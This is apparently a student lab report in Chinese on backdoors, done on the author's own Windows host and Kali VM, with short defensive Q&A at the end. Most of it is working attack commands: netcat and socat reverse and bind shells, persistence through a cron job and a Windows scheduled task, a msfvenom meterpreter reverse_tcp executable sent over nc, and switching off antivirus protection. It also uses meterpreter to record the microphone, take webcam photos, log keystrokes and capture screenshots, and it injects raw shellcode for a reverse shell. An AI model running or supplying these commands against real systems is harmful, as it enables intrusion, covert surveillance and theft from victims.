• Exp2后门原理与实践


    一、实验内容

    • 使用netcat获取主机操作Shell,cron启动;
    • 使用socat获取主机操作Shell, 任务计划启动;
    • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell;
    • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权;
    • 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

    二、实践过程记录

    查看Windows10主机和Kali虚拟机的IP地址:
    image
    image

    1.使用netcat获取主机操作Shell,启动cron

    在主机中获取虚拟机shell

      先在主机中使用ncat -l -p 11319监听本机的11319端口,然后在虚拟机中使用nc 192.168.43.61(主机IP) 11319 -e /bin/sh连接主机反弹shell。然后成功getshell。接着就可以随便输入一些命令了。
    image

    在虚拟机中获取主机shell

      先在虚拟机中用nc -l -p 11319监听主机11319端口,然后在主机中用ncat -e cmd 192.168.30.141 11319,成功获取到主机shell。
    image

    在虚拟机中启动cron并在主机监听

      先在虚拟机上用crontab -e指令编辑一条定时任务,在这里我选择输入2,2表示选择vim编辑器。
    image
    在最后一行添加13 * * * * nc 192.168.43.61 11319 -e /bin/sh,即在每个小时的第13分钟反向连接Windows主机的1319端口
    image
    等到每小时的13分,在ip地址为192.168.43.61的主机端用ncat -l -p 11319打开监听即可
    image

    2.使用socat获取主机操作Shell,任务计划启动

    先在Kali中用man socat查看使用说明
    image
    然后在Windows中按Win+R,再输入compmgmt.msc打开计算机管理,再在系统工具中的任务计划程序中创建任务,接着设置任务名称
    image
    新建触发器
    image
    下一步是新建操作,操作设置为启动程序socat.exe,并添加参数tcp-listen:11319 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口11319,同时把cmd.exe的stderr重定向
    image
    设置好后把电脑锁屏(Win+L),解锁后在Kali中输入命令socat - tcp:192.168.43.61:11319,成功获取Windows的Shell
    image

    3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    先在Kali上生成后门可执行程序20191319_backdoor.exe
    输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.141 LPORT=11319 -f exe > 20191319_backdoor.exe,其中

    • LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
    • LPORT是回连的端口
    • -p 使用的payload。
    • payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
    • -f 生成文件的类型
      image

    在主机上打开监听
    image

    在Kali上用nc 192.168.43.61 1319 < 20191319_backdoor.exe将生成的20191319_backdoor.exe后门程序传过去,接着在kali上使用msfconsole指令进入msf控制台对msf控制台进行配置。
    然后依次输入以下命令

    	use exploit/multi/handler
    	set payload windows/meterpreter/reverse_tcp
    	set LHOST 192.168.30.141
    	set LPORT 11319
    

    image

    配置完后的情况
    image

    找到20191319_backdoor.exe在主机的位置
    image

    接着输入exploit进行监听,在主机在打开20191319_backdoor.exe,在打开之前要在Windows安全中心病毒和威胁保护关掉实时保护,不然20191319_backdoor.exe会被清掉。
    image
    成功获取到主机的shell
    image

    4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    获取目标主机音频

    在之前进入的MSF exploit中输入record_mic指令进行录音(-d可设置时长)
    image

    获取目标主机摄像头

    输入webcam_snap指令控制摄像头进行拍照
    image
    run webcam可以进行屏幕录制,相当于不间断地用摄像头拍照片,并不断存储在一个jpg中,在文件系统中我们会看到一个在不断变化的jpg文件
    image

    获取击键记录

    输入keyscan_start开始捕获键盘记录
    image
    keyscan_dump获取击键记录
    image

    截取主机屏幕

    使用screenshot指令可以进行截屏
    image

    5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

    在本地获取shell
    先按照之前实验1的找到返回地址,并关闭地址随机化。
    再对msf控制台进行配置,依次输入以下命令

    	use exploit/multi/handler
    	set payload linux/x86/shell/reverse_nonx_tcp
    	set LHOST 192.168.30.141
    	set LPORT 1319
    

    image
    再在另一终端输入下面命令

    msfvenom -p linux/x86/shell/reverse_nonx_tcp LHOST=192.168.30.141 LPORT=1319 -f c
    perl -e 'print "A" x 32;print "\x60\xd1\xff\xff";print "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x1e\x8d\x66\x68\x05\x27\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1"'>hack1319.bin
    

    image
    然后上面那个msf控制台输入exploit再在终端输入(cat hack1319.bin ;cat) | ./pwn20191319,再按回车就攻击成功了
    image

    三、基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?
    从网络上下载非正版的软件安装包、压缩包;在移动设备中拷贝别人的文件。

    (2)例举你知道的后门如何启动起来(win及linux)的方式?
    Windows:设置为开机自启动和用户执行带有后门的可执行文件。
    Linux:通过crontab功能将后门设为定时启动。

    (3)Meterpreter有哪些给你映像深刻的功能?
    感觉在它面前完全没有隐私,它能够操控你的电脑进行拍照、屏幕截图和录音频等一系列的操作。

    (4)如何发现自己有系统有没有被安装后门?
    使用杀毒软件,定时经常性的进行全盘查杀;扫描端口,查看端口是否存在绑定后门程序等问题;查看当前电脑的开机项,检测是否有未知项。

    四、实验总结与体会

      通过这次实验,我学习了后门的基本原理及它的运行过程,让我从实践的角度切实了解到计算机后门的存在和一些后门的设置方法。同时我也明白了在信息化时代,不经意间打开一个文件就可能把自己的信息给泄露出去了,所以平时要避免打开一些不良的或者未知的文件。

  • 相关阅读:
    从寻找资源的习惯上谈如何获得好的代码及控件(使用Koders查找)
    数据仓库的一些基本知识2
    淘宝API开发系列商家的绑定
    淘宝API开发系列开篇概述
    读取实体类的属性的备注作为表头的应用
    设置Windows服务允许进行桌面交互,实现屏幕监控
    C#进行Visio二次开发之组合形状操作
    吉日嘎啦通用权限管理系统解读及重构升华高度封装的编辑窗体
    WinForm界面开发之模块化分合
    CLR中的内存管理
  • 原文地址:https://www.cnblogs.com/20191319cgh/p/16088454.html
Copyright © 2020-2023  润新知